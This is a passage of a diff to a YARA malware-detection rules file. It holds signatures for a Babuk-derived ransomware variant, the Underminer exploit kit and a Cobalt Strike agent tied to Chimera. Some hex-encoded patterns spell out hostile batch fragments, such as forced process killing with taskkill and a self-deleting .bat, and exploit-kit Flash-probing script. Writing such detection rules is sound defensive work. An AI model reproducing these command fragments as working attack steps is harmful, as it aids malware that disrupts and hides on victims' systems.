-		$seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d }
-		$seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 }
-		$seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 }
-		$seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 }
-		$seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 }
-		$seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 }
-		$seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d }
-		$seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 }
+		$s1 = { 7b 00 22 00 44 00 61 00 74 00 61 00 22 00 3a 00 5b 00 22 00 00 07 22 00 [0-8] 5d 00 7d }
+		$s2 = "application/json" fullword wide
+		$s3 = { 40 00 45 00 43 00 48 00 4f 00 20 00 4f 00 46 00 46 00 0a 00 00 1d 74 00 61 00 73 00 6b 00 6b 00 69 00 6c 00 6c 00 20 00 2f 00 49 00 4d 00 20 00 22 00 00 17 22 00 20 00 2f 00 46 00 20 00 3e 00 20 00 6e 00 75 00 6c 00 0a 00 00 2b 70 00 69 00 6e 00 67 00 20 00 [12-28] 00 20 00 6e 00 75 00 6c }
+		$s4 = { 2a 00 65 00 78 00 65 00 00 0b 2a 00 70 00 72 00 6f 00 63 00 00 07 2a 00 6b 00 6c 00 00 07 64 00 69 00 72 00 00 11 66 00 69 00 6c 00 65 00 3a 00 2f 00 2f 00 2f }
+		$s5 = { 16 0a 2b 13 02 06 02 06 91 1f 2a 28 ?? 00 00 0a 61 d2 9c 06 17 58 0a 06 02 8e 69 }
+		$s6 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$s7 = { 65 00 63 00 68 00 6f 00 20 00 [2-10] 20 00 7c 00 20 00 64 00 65 00 6c 00 20 00 [2-10] 2e 00 62 00 61 00 74 00 00 0f [2-10] 00 2e 00 62 00 61 00 74 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 300KB and 7 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 15KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Piton variant (rebuild from the Babuk leaks)"
+		description = "Detect Underminer exploit kit"
 		author = "Arkbird_SOLG"
-		id = "433d0692-553b-5efe-84e4-134e99342fe5"
-		date = "2021-11-03"
-		modified = "2021-11-04"
+		id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61"
+		date = "2021-04-14"
+		modified = "2021-04-15"
+		reference = "https://twitter.com/nao_sec/status/1382358986813415427"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20"
+		license_url = "N/A"
+		logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7"
+		score = 75
+		quality = 63
+		tags = "FILE"
+		hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d"
+
+	strings:
+		$s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 }
+		$s2 = "$version" fullword ascii
+		$s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 }
+		$s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d }
+		$s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 }
+		$s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 }
+		$s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 }
+		$s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 }
+
+	condition:
+		filesize > 5KB and 6 of ( $s* )
+}
+rule ARKBIRD_SOLG_APT_Chimera_Sept_2020_1 : FILE
+{
+	meta:
+		description = "Detect Cobalt Strike agent used by Chimera"
+		author = "Arkbird_SOLG"
+		id = "7a7c3952-fa6e-5643-a40f-d2e466b8c2a2"
+		date = "2020-10-03"
+		modified = "2020-10-04"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-03/Chimera/APT_Chimera_Sept_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c"
+		logic_hash = "8fdb34c793534f8632fd2c35b89462d4a736a31f2347e7bab3e8bcebff04c21f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac"
-		hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9"
-		hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1"
-		tlp = "white"
-		adversary = "RAAS"
+		hash1 = "f6d89ff139f4169e8a67332a0fd55b6c9beda0b619b1332ddc07d9a860558bab"
 
 	strings:
